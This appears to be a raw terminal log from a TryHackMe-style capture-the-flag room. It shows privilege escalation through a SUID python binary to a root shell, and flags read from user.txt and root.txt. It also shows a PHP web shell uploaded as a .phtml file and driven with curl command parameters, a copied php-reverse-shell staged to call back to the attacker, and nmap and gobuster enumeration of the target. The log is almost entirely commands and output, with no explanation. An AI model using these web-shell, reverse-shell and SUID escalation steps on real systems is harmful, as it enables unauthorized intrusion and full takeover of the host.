find: './proc/706/fd': Permission denied
find: './proc/706/map_files': Permission denied
find: './proc/706/fdinfo': Permission denied
find: './proc/706/ns': Permission denied
find: './proc/786/task/786/fd': Permission denied
find: './proc/786/task/786/fdinfo': Permission denied
find: './proc/786/task/786/ns': Permission denied
find: './proc/786/task/863/fd': Permission denied
find: './proc/786/task/863/fdinfo': Permission denied
find: './proc/786/task/863/ns': Permission denied
find: './proc/786/task/864/fd': Permission denied
find: './proc/786/task/864/fdinfo': Permission denied
find: './proc/786/task/864/ns': Permission denied
find: './proc/786/fd': Permission denied
find: './proc/786/map_files': Permission denied
find: './proc/786/fdinfo': Permission denied
find: './proc/786/ns': Permission denied
find: './proc/803/task/803/fd': Permission denied
find: './proc/803/task/803/fdinfo': Permission denied
find: './proc/803/task/803/ns': Permission denied
find: './proc/803/fd': Permission denied
find: './proc/803/map_files': Permission denied
find: './proc/803/fdinfo': Permission denied
find: './proc/803/ns': Permission denied
find: './proc/805/task/805/fd': Permission denied
find: './proc/805/task/805/fdinfo': Permission denied
find: './proc/805/task/805/ns': Permission denied
find: './proc/805/fd': Permission denied
find: './proc/805/map_files': Permission denied
find: './proc/805/fdinfo': Permission denied
find: './proc/805/ns': Permission denied
find: './proc/821/task/821/fd': Permission denied
find: './proc/821/task/821/fdinfo': Permission denied
find: './proc/821/task/821/ns': Permission denied
find: './proc/821/task/883/fd': Permission denied
find: './proc/821/task/883/fdinfo': Permission denied
find: './proc/821/task/883/ns': Permission denied
find: './proc/821/task/885/fd': Permission denied
find: './proc/821/task/885/fdinfo': Permission denied
find: './proc/821/task/885/ns': Permission denied
find: './proc/821/fd': Permission denied
find: './proc/821/map_files': Permission denied
find: './proc/821/fdinfo': Permission denied
find: './proc/821/ns': Permission denied
find: './proc/822/task/822/fd': Permission denied
find: './proc/822/task/822/fdinfo': Permission denied
find: './proc/822/task/822/ns': Permission denied
find: './proc/822/fd': Permission denied
find: './proc/822/map_files': Permission denied
find: './proc/822/fdinfo': Permission denied
find: './proc/822/ns': Permission denied
find: './proc/829/task/829/fd': Permission denied
find: './proc/829/task/829/fdinfo': Permission denied
find: './proc/829/task/829/ns': Permission denied
find: './proc/829/fd': Permission denied
find: './proc/829/map_files': Permission denied
find: './proc/829/fdinfo': Permission denied
find: './proc/829/ns': Permission denied
find: './proc/841/task/841/fd': Permission denied
find: './proc/841/task/841/fdinfo': Permission denied
find: './proc/841/task/841/ns': Permission denied
find: './proc/841/task/843/fd': Permission denied
find: './proc/841/task/843/fdinfo': Permission denied
find: './proc/841/task/843/ns': Permission denied
find: './proc/841/fd': Permission denied
find: './proc/841/map_files': Permission denied
find: './proc/841/fdinfo': Permission denied
find: './proc/841/ns': Permission denied
find: './proc/842/task/842/fd': Permission denied
find: './proc/842/task/842/fdinfo': Permission denied
find: './proc/842/task/842/ns': Permission denied
find: './proc/842/task/889/fd': Permission denied
find: './proc/842/task/889/fdinfo': Permission denied
find: './proc/842/task/889/ns': Permission denied
find: './proc/842/task/890/fd': Permission denied
find: './proc/842/task/890/fdinfo': Permission denied
find: './proc/842/task/890/ns': Permission denied
find: './proc/842/task/891/fd': Permission denied
find: './proc/842/task/891/fdinfo': Permission denied
find: './proc/842/task/891/ns': Permission denied
find: './proc/842/fd': Permission denied
find: './proc/842/map_files': Permission denied
find: './proc/842/fdinfo': Permission denied
find: './proc/842/ns': Permission denied
find: './proc/846/task/846/fd': Permission denied
find: './proc/846/task/846/fdinfo': Permission denied
find: './proc/846/task/846/ns': Permission denied
find: './proc/846/task/917/fd': Permission denied
find: './proc/846/task/917/fdinfo': Permission denied
find: './proc/846/task/917/ns': Permission denied
find: './proc/846/fd': Permission denied
find: './proc/846/map_files': Permission denied
find: './proc/846/fdinfo': Permission denied
find: './proc/846/ns': Permission denied
find: './proc/847/task/847/fd': Permission denied
find: './proc/847/task/847/fdinfo': Permission denied
find: './proc/847/task/847/ns': Permission denied
find: './proc/847/task/1043/fd': Permission denied
find: './proc/847/task/1043/fdinfo': Permission denied
find: './proc/847/task/1043/ns': Permission denied
find: './proc/847/task/1044/fd': Permission denied
find: './proc/847/task/1044/fdinfo': Permission denied
find: './proc/847/task/1044/ns': Permission denied
find: './proc/847/task/1045/fd': Permission denied
find: './proc/847/task/1045/fdinfo': Permission denied
find: './proc/847/task/1045/ns': Permission denied
find: './proc/847/task/1046/fd': Permission denied
find: './proc/847/task/1046/fdinfo': Permission denied
find: './proc/847/task/1046/ns': Permission denied
find: './proc/847/task/1049/fd': Permission denied
find: './proc/847/task/1049/fdinfo': Permission denied
find: './proc/847/task/1049/ns': Permission denied
find: './proc/847/task/1051/fd': Permission denied
find: './proc/847/task/1051/fdinfo': Permission denied
find: './proc/847/task/1051/ns': Permission denied
find: './proc/847/task/1052/fd': Permission denied
find: './proc/847/task/1052/fdinfo': Permission denied
find: './proc/847/task/1052/ns': Permission denied
find: './proc/847/task/1074/fd': Permission denied
find: './proc/847/task/1074/fdinfo': Permission denied
find: './proc/847/task/1074/ns': Permission denied
find: './proc/847/task/1115/fd': Permission denied
find: './proc/847/task/1115/fdinfo': Permission denied
find: './proc/847/task/1115/ns': Permission denied
find: './proc/847/task/1483/fd': Permission denied
find: './proc/847/task/1483/fdinfo': Permission denied
find: './proc/847/task/1483/ns': Permission denied
find: './proc/847/task/1484/fd': Permission denied
find: './proc/847/task/1484/fdinfo': Permission denied
find: './proc/847/task/1484/ns': Permission denied
find: './proc/847/fd': Permission denied
find: './proc/847/map_files': Permission denied
find: './proc/847/fdinfo': Permission denied
find: './proc/847/ns': Permission denied
find: './proc/874/task/874/fd': Permission denied
find: './proc/874/task/874/fdinfo': Permission denied
find: './proc/874/task/874/ns': Permission denied
find: './proc/874/task/933/fd': Permission denied
find: './proc/874/task/933/fdinfo': Permission denied
find: './proc/874/task/933/ns': Permission denied
find: './proc/874/fd': Permission denied
find: './proc/874/map_files': Permission denied
find: './proc/874/fdinfo': Permission denied
find: './proc/874/ns': Permission denied
find: './proc/880/task/880/fd': Permission denied
find: './proc/880/task/880/fdinfo': Permission denied
find: './proc/880/task/880/ns': Permission denied
find: './proc/880/fd': Permission denied
find: './proc/880/map_files': Permission denied
find: './proc/880/fdinfo': Permission denied
find: './proc/880/ns': Permission denied
find: './proc/902/task/902/fd': Permission denied
find: './proc/902/task/902/fdinfo': Permission denied
find: './proc/902/task/902/ns': Permission denied
find: './proc/902/fd': Permission denied
find: './proc/902/map_files': Permission denied
find: './proc/902/fdinfo': Permission denied
find: './proc/902/ns': Permission denied
find: './proc/911/task/911/fd': Permission denied
find: './proc/911/task/911/fdinfo': Permission denied
find: './proc/911/task/911/ns': Permission denied
find: './proc/911/task/913/fd': Permission denied
find: './proc/911/task/913/fdinfo': Permission denied
find: './proc/911/task/913/ns': Permission denied
find: './proc/911/task/915/fd': Permission denied
find: './proc/911/task/915/fdinfo': Permission denied
find: './proc/911/task/915/ns': Permission denied
find: './proc/911/fd': Permission denied
find: './proc/911/map_files': Permission denied
find: './proc/911/fdinfo': Permission denied
find: './proc/911/ns': Permission denied
find: './proc/912/task/912/fd': Permission denied
find: './proc/912/task/912/fdinfo': Permission denied
find: './proc/912/task/912/ns': Permission denied
find: './proc/912/fd': Permission denied
find: './proc/912/map_files': Permission denied
find: './proc/912/fdinfo': Permission denied
find: './proc/912/ns': Permission denied
find: './proc/953/task/953/fd': Permission denied
find: './proc/953/task/953/fdinfo': Permission denied
find: './proc/953/task/953/ns': Permission denied
find: './proc/953/fd': Permission denied
find: './proc/953/map_files': Permission denied
find: './proc/953/fdinfo': Permission denied
find: './proc/953/ns': Permission denied
find: './proc/1467/task/1467/fd': Permission denied
find: './proc/1467/task/1467/fdinfo': Permission denied
find: './proc/1467/task/1467/ns': Permission denied
find: './proc/1467/fd': Permission denied
find: './proc/1467/map_files': Permission denied
find: './proc/1467/fdinfo': Permission denied
find: './proc/1467/ns': Permission denied
find: './proc/1504/task/1504/fd': Permission denied
find: './proc/1504/task/1504/fdinfo': Permission denied
find: './proc/1504/task/1504/ns': Permission denied
find: './proc/1504/fd': Permission denied
find: './proc/1504/map_files': Permission denied
find: './proc/1504/fdinfo': Permission denied
find: './proc/1504/ns': Permission denied
find: './proc/1508/task/1508/fd': Permission denied
find: './proc/1508/task/1508/fdinfo': Permission denied
find: './proc/1508/task/1508/ns': Permission denied
find: './proc/1508/fd': Permission denied
find: './proc/1508/map_files': Permission denied
find: './proc/1508/fdinfo': Permission denied
find: './proc/1508/ns': Permission denied
find: './proc/1520/task/1520/fd': Permission denied
find: './proc/1520/task/1520/fdinfo': Permission denied
find: './proc/1520/task/1520/ns': Permission denied
find: './proc/1520/fd': Permission denied
find: './proc/1520/map_files': Permission denied
find: './proc/1520/fdinfo': Permission denied
find: './proc/1520/ns': Permission denied
find: './proc/1526/task/1526/fd': Permission denied
find: './proc/1526/task/1526/fdinfo': Permission denied
find: './proc/1526/task/1526/ns': Permission denied
find: './proc/1526/fd': Permission denied
find: './proc/1526/map_files': Permission denied
find: './proc/1526/fdinfo': Permission denied
find: './proc/1526/ns': Permission denied
find: './proc/1553/task/1553/fd': Permission denied
find: './proc/1553/task/1553/fdinfo': Permission denied
find: './proc/1553/task/1553/ns': Permission denied
find: './proc/1553/fd': Permission denied
find: './proc/1553/map_files': Permission denied
find: './proc/1553/fdinfo': Permission denied
find: './proc/1553/ns': Permission denied
find: './proc/1554/task/1554/fd': Permission denied
find: './proc/1554/task/1554/fdinfo': Permission denied
find: './proc/1554/task/1554/ns': Permission denied
find: './proc/1554/fd': Permission denied
find: './proc/1554/map_files': Permission denied
find: './proc/1554/fdinfo': Permission denied
find: './proc/1554/ns': Permission denied
find: './proc/1564/task/1564/fd': Permission denied
find: './proc/1564/task/1564/fdinfo': Permission denied
find: './proc/1564/task/1564/ns': Permission denied
find: './proc/1564/fd': Permission denied
find: './proc/1564/map_files': Permission denied
find: './proc/1564/fdinfo': Permission denied
find: './proc/1564/ns': Permission denied
find: './proc/1570/task/1570/fd': Permission denied
find: './proc/1570/task/1570/fdinfo': Permission denied
find: './proc/1570/task/1570/ns': Permission denied
find: './proc/1570/fd': Permission denied
find: './proc/1570/map_files': Permission denied
find: './proc/1570/fdinfo': Permission denied
find: './proc/1570/ns': Permission denied
find: './proc/1577/task/1577/fd': Permission denied
find: './proc/1577/task/1577/fdinfo': Permission denied
find: './proc/1577/task/1577/ns': Permission denied
find: './proc/1577/fd': Permission denied
find: './proc/1577/map_files': Permission denied
find: './proc/1577/fdinfo': Permission denied
find: './proc/1577/ns': Permission denied
find: './proc/1578/task/1578/fd': Permission denied
find: './proc/1578/task/1578/fdinfo': Permission denied
find: './proc/1578/task/1578/ns': Permission denied
find: './proc/1578/fd': Permission denied
find: './proc/1578/map_files': Permission denied
find: './proc/1578/fdinfo': Permission denied
find: './proc/1578/ns': Permission denied
find: './proc/1710/task/1710/fd': Permission denied
find: './proc/1710/task/1710/fdinfo': Permission denied
find: './proc/1710/task/1710/ns': Permission denied
find: './proc/1710/fd': Permission denied
find: './proc/1710/map_files': Permission denied
find: './proc/1710/fdinfo': Permission denied
find: './proc/1710/ns': Permission denied
find: './proc/1713/task/1713/fd': Permission denied
find: './proc/1713/task/1713/fdinfo': Permission denied
find: './proc/1713/task/1713/ns': Permission denied
find: './proc/1713/fd': Permission denied
find: './proc/1713/map_files': Permission denied
find: './proc/1713/fdinfo': Permission denied
find: './proc/1713/ns': Permission denied
find: './proc/1937/task/1937/fd': Permission denied
find: './proc/1937/task/1937/fdinfo': Permission denied
find: './proc/1937/task/1937/ns': Permission denied
find: './proc/1937/fd': Permission denied
find: './proc/1937/map_files': Permission denied
find: './proc/1937/fdinfo': Permission denied
find: './proc/1937/ns': Permission denied
find: './proc/1938/task/1938/fd': Permission denied
find: './proc/1938/task/1938/fdinfo': Permission denied
find: './proc/1938/task/1938/ns': Permission denied
find: './proc/1938/fd': Permission denied
find: './proc/1938/map_files': Permission denied
find: './proc/1938/fdinfo': Permission denied
find: './proc/1938/ns': Permission denied
find: './proc/1943/task/1943/fd': Permission denied
find: './proc/1943/task/1943/fdinfo': Permission denied
find: './proc/1943/task/1943/ns': Permission denied
find: './proc/1943/fd': Permission denied
find: './proc/1943/map_files': Permission denied
find: './proc/1943/fdinfo': Permission denied
find: './proc/1943/ns': Permission denied
./var/www/user.txt
find: './var/spool/rsyslog': Permission denied
find: './var/spool/cron/atjobs': Permission denied
find: './var/spool/cron/crontabs': Permission denied
find: './var/spool/cron/atspool': Permission denied
find: './var/log/apache2': Permission denied
find: './var/log/unattended-upgrades': Permission denied
find: './var/cache/apt/archives/partial': Permission denied
find: './var/cache/ldconfig': Permission denied
find: './var/lib/snapd/cookie': Permission denied
find: './var/lib/snapd/void': Permission denied
find: './var/lib/php/sessions': Permission denied
find: './var/lib/update-notifier/package-data-downloads/partial': Permission denied
find: './var/lib/private': Permission denied
find: './var/lib/apt/lists/partial': Permission denied
find: './var/lib/polkit-1': Permission denied
find: './snap/core/8268/etc/chatscripts': Permission denied
find: './snap/core/8268/etc/ppp/peers': Permission denied
find: './snap/core/8268/etc/ssl/private': Permission denied
find: './snap/core/8268/root': Permission denied
find: './snap/core/8268/var/cache/ldconfig': Permission denied
find: './snap/core/8268/var/lib/machines': Permission denied
find: './snap/core/8268/var/lib/snapd/void': Permission denied
find: './snap/core/8268/var/lib/waagent': Permission denied
find: './snap/core/8268/var/spool/cron/crontabs': Permission denied
find: './snap/core/8268/var/spool/rsyslog': Permission denied
find: './snap/core/9665/etc/chatscripts': Permission denied
find: './snap/core/9665/etc/ppp/peers': Permission denied
find: './snap/core/9665/etc/ssl/private': Permission denied
find: './snap/core/9665/root': Permission denied
find: './snap/core/9665/var/cache/ldconfig': Permission denied
find: './snap/core/9665/var/lib/machines': Permission denied
find: './snap/core/9665/var/lib/snapd/void': Permission denied
find: './snap/core/9665/var/lib/waagent': Permission denied
find: './snap/core/9665/var/spool/cron/crontabs': Permission denied
find: './snap/core/9665/var/spool/rsyslog': Permission denied
bash-4.4$
bash-4.4$
bash-4.4$
bash-4.4$
bash-4.4$
bash-4.4$ cat ./var/www/user.txt
cat ./var/www/user.txt
THM{y0u_g0t_a_sh3ll}
bash-4.4$ sudo -l
sudo -l
[sudo] password for www-data: a
Sorry, try again.
[sudo] password for www-data: a
Sorry, try again.
[sudo] password for www-data: a
sudo: 3 incorrect password attempts
bash-4.4$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
bash-4.4$ sudo su
sudo su
[sudo] password for www-data: a
Sorry, try again.
[sudo] password for www-data: a
Sorry, try again.
[sudo] password for www-data: a
sudo: 3 incorrect password attempts
bash-4.4$ su root
su root
Password:
a
a
a
a
a
a
asu: Authentication failure
bash-4.4$ a
bash: a: command not found
bash-4.4$ a
bash: a: command not found
bash-4.4$ a
bash: a: command not found
bash-4.4$ THM{y0u_g0t_a_sh3ll}
aTHM{y0u_g0t_a_sh3ll}
bash: aTHM{y0u_g0t_a_sh3ll}: command not found
bash-4.4$
bash-4.4$
bash-4.4$ THM{y0u_g0t_a_sh3ll}
THM{y0u_g0t_a_sh3ll}
bash: THM{y0u_g0t_a_sh3ll}: command not found
bash-4.4$ /usr/bin/python -c 'import os; os.execl("/bin/bash", "sh", "-p")'
/usr/bin/python -c 'import os; os.execl("/bin/bash", "sh", "-p")'
sh-4.4# whoami
whoami
root
sh-4.4# ls -la
ls -la
total 2097256
drwxr-xr-x 24 root root 4096 Aug 4 2020 .
drwxr-xr-x 24 root root 4096 Aug 4 2020 ..
drwxr-xr-x 2 root root 4096 Aug 4 2020 bin
drwxr-xr-x 3 root root 4096 Aug 4 2020 boot
drwxr-xr-x 2 root root 4096 Aug 4 2020 cdrom
drwxr-xr-x 15 root root 3720 Aug 6 18:18 dev
drwxr-xr-x 96 root root 4096 Aug 4 2020 etc
drwxr-xr-x 4 root root 4096 Aug 4 2020 home
lrwxrwxrwx 1 root root 34 Aug 4 2020 initrd.img -> boot/initrd.img-4.15.0-112-generic
lrwxrwxrwx 1 root root 34 Aug 4 2020 initrd.img.old -> boot/initrd.img-4.15.0-112-generic
drwxr-xr-x 22 root root 4096 Aug 4 2020 lib
drwxr-xr-x 2 root root 4096 Aug 4 2020 lib64
drwx------ 2 root root 16384 Aug 4 2020 lost+found
drwxr-xr-x 2 root root 4096 Feb 3 2020 media
drwxr-xr-x 2 root root 4096 Feb 3 2020 mnt
drwxr-xr-x 2 root root 4096 Feb 3 2020 opt
dr-xr-xr-x 112 root root 0 Aug 6 18:18 proc
drwx------ 6 root root 4096 Aug 4 2020 root
drwxr-xr-x 26 root root 860 Aug 6 18:20 run
drwxr-xr-x 2 root root 12288 Aug 4 2020 sbin
drwxr-xr-x 4 root root 4096 Aug 4 2020 snap
drwxr-xr-x 2 root root 4096 Feb 3 2020 srv
-rw------- 1 root root 2147483648 Aug 4 2020 swap.img
dr-xr-xr-x 13 root root 0 Aug 6 19:00 sys
drwxrwxrwt 2 root root 4096 Aug 6 18:57 tmp
drwxr-xr-x 10 root root 4096 Feb 3 2020 usr
drwxr-xr-x 14 root root 4096 Aug 4 2020 var
lrwxrwxrwx 1 root root 31 Aug 4 2020 vmlinuz -> boot/vmlinuz-4.15.0-112-generic
lrwxrwxrwx 1 root root 31 Aug 4 2020 vmlinuz.old -> boot/vmlinuz-4.15.0-112-generic
sh-4.4# pwd
pwd
/
sh-4.4# ls -la /root
ls -la /root
total 40
drwx------ 6 root root 4096 Aug 4 2020 .
drwxr-xr-x 24 root root 4096 Aug 4 2020 ..
-rw------- 1 root root 1423 Aug 4 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Aug 4 2020 .cache
drwx------ 3 root root 4096 Aug 4 2020 .gnupg
drwxr-xr-x 3 root root 4096 Aug 4 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Aug 4 2020 .ssh
-rw-r--r-- 1 root root 26 Aug 4 2020 root.txt
sh-4.4# cat /root/root.txt
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}
sh-4.4#
root@ip-10-201-95-161:~# cd /tmp/
root@ip-10-201-95-161:/tmp# vim shell.php
root@ip-10-201-95-161:/tmp# chmod +x shell.php
root@ip-10-201-95-161:/tmp# cp -rv shell.php shell.phtml
'shell.php' -> 'shell.phtml'
root@ip-10-201-95-161:/tmp# curl -o- http://10.201.48.99/uploads/shell.phtml?cmd=ls
shell.phtml
root@ip-10-201-95-161:/tmp# curl -o- http://10.201.48.99/uploads/shell.phtml?cmd=ls -la
shell.phtml
root@ip-10-201-95-161:/tmp# curl -o- http://10.201.48.99/uploads/shell.phtml?cmd=ls -la'
> ^C
root@ip-10-201-95-161:/tmp# curl -o- http://10.201.48.99/uploads/shell.phtml?cmd='ls -la'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.1.1 Port 80</address>
</body></html>
root@ip-10-201-95-161:/tmp# curl -o- http://10.201.48.99/uploads/shell.phtml?cmd=ls ..
shell.phtml
curl: (6) Could not resolve host: ..
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=ls ..'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.1.1 Port 80</address>
</body></html>
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=ls%20-la'
total 12
drwxrwxrwx 2 www-data www-data 4096 Aug 6 18:49 .
drwxr-xr-x 6 www-data www-data 4096 Aug 4 2020 ..
-rw-r--r-- 1 www-data www-data 31 Aug 6 18:49 shell.phtml
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=ls%20-la%20..'
total 284
drwxr-xr-x 6 www-data www-data 4096 Aug 4 2020 .
drwxr-xr-x 3 www-data www-data 4096 Aug 4 2020 ..
-rw-r--r-- 1 www-data www-data 259678 Aug 4 2020 Website.zip
drwxr-xr-x 2 www-data www-data 4096 Aug 4 2020 css
-rw-r--r-- 1 www-data www-data 645 Aug 4 2020 index.php
drwxr-xr-x 2 www-data www-data 4096 Jun 2 2020 js
drwxr-xr-x 2 www-data www-data 4096 Aug 4 2020 panel
drwxrwxrwx 2 www-data www-data 4096 Aug 6 18:49 uploads
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=cp%20../Website.zip%20.'
root@ip-10-201-95-161:/tmp# cp shell.phtml better.phtml
root@ip-10-201-95-161:/tmp# vim better.phtml
root@ip-10-201-95-161:/tmp# ll /usr/share/webshells/php/php-reverse-shell.php
-rw-r--r-- 1 root root 5507 Nov 30 2020 /usr/share/webshells/php/php-reverse-shell.php
root@ip-10-201-95-161:/tmp# cp /usr/share/webshells/php/php-reverse-shell.php .
root@ip-10-201-95-161:/tmp# mv php-reverse-shell.php better.phtml
root@ip-10-201-95-161:/tmp# vim better.phtml
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=better.phtml'
root@ip-10-201-95-161:/tmp# vim better.phtml
root@ip-10-201-95-161:/tmp# vim better.phtml
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=better.phtml'
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=ls%20-la%20..'
total 284
drwxr-xr-x 6 www-data www-data 4096 Aug 4 2020 .
drwxr-xr-x 3 www-data www-data 4096 Aug 4 2020 ..
-rw-r--r-- 1 www-data www-data 259678 Aug 4 2020 Website.zip
drwxr-xr-x 2 www-data www-data 4096 Aug 4 2020 css
-rw-r--r-- 1 www-data www-data 645 Aug 4 2020 index.php
drwxr-xr-x 2 www-data www-data 4096 Jun 2 2020 js
drwxr-xr-x 2 www-data www-data 4096 Aug 4 2020 panel
drwxrwxrwx 2 www-data www-data 4096 Aug 6 18:57 uploads
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/shell.phtml?cmd=ls%20-la%20'
total 276
drwxrwxrwx 2 www-data www-data 4096 Aug 6 18:57 .
drwxr-xr-x 6 www-data www-data 4096 Aug 4 2020 ..
-rw-r--r-- 1 www-data www-data 259678 Aug 6 18:51 Website.zip
-rw-r--r-- 1 www-data www-data 5496 Aug 6 18:57 better.phtml
-rw-r--r-- 1 www-data www-data 31 Aug 6 18:49 shell.phtml
root@ip-10-201-95-161:/tmp# curl -o- 'http://10.201.48.99/uploads/better.phtml'
root@ip-10-201-95-161:~# ping -c1 10.201.48.99
PING 10.201.48.99 (10.201.48.99) 56(84) bytes of data.
64 bytes from 10.201.48.99: icmp_seq=1 ttl=64 time=0.732 ms
--- 10.201.48.99 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.732/0.732/0.732/0.000 ms
root@ip-10-201-95-161:~# sudo nmap -n -Pn -sV -O 10.201.48.99 -oA nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2025-08-06 19:34 BST
Nmap scan report for 10.201.48.99
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 16:FF:EC:5F:BF:69 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/6%OT=22%CT=1%CU=43585%PV=Y%DS=1%DC=D%G=Y%M=16FFEC%TM
OS:=6893A054%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M2301ST11NW6%O2=M2301ST11NW6%O3=M2301NNT11NW6%O4=M2301ST11NW6
OS:%O5=M2301ST11NW6%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B
OS:3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.76 seconds
root@ip-10-201-95-161:~# gobuster
Usage:
gobuster [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
dir Uses directory/file enumeration mode
dns Uses DNS subdomain enumeration mode
fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body
gcs Uses gcs bucket enumeration mode
help Help about any command
s3 Uses aws bucket enumeration mode
tftp Uses TFTP enumeration mode
version shows the current version
vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)
Flags:
--debug Enable debug output
--delay duration Time each thread waits between requests (e.g. 1500ms)
-h, --help help for gobuster
--no-color Disable color output
--no-error Don't display errors
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-p, --pattern string File containing replacement patterns
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist. Set to - to use STDIN.
--wordlist-offset int Resume from a given position in the wordlist (defaults to 0)
Use "gobuster [command] --help" for more information about a command.
root@ip-10-201-95-161:~# gobuster dir --threads 100 --wordlist /usr/share/wordlists/dirb/common.txt --expanded --url 10.201.48.99
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.201.48.99
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://10.201.48.99/.htaccess (Status: 403) [Size: 277]
http://10.201.48.99/css (Status: 301) [Size: 310] [--> http://10.201.48.99/css/]
http://10.201.48.99/.htpasswd (Status: 403) [Size: 277]
http://10.201.48.99/index.php (Status: 200) [Size: 616]
http://10.201.48.99/js (Status: 301) [Size: 309] [--> http://10.201.48.99/js/]
http://10.201.48.99/.hta (Status: 403) [Size: 277]
http://10.201.48.99/panel (Status: 301) [Size: 312] [--> http://10.201.48.99/panel/]
http://10.201.48.99/uploads (Status: 301) [Size: 314] [--> http://10.201.48.99/uploads/]
http://10.201.48.99/server-status (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
root@ip-10-201-95-161:~# sudo gunzip /usr/share/wordlists/rockyou.txt ^C
root@ip-10-201-95-161:~# panelpanelpanelpanelpanel^C
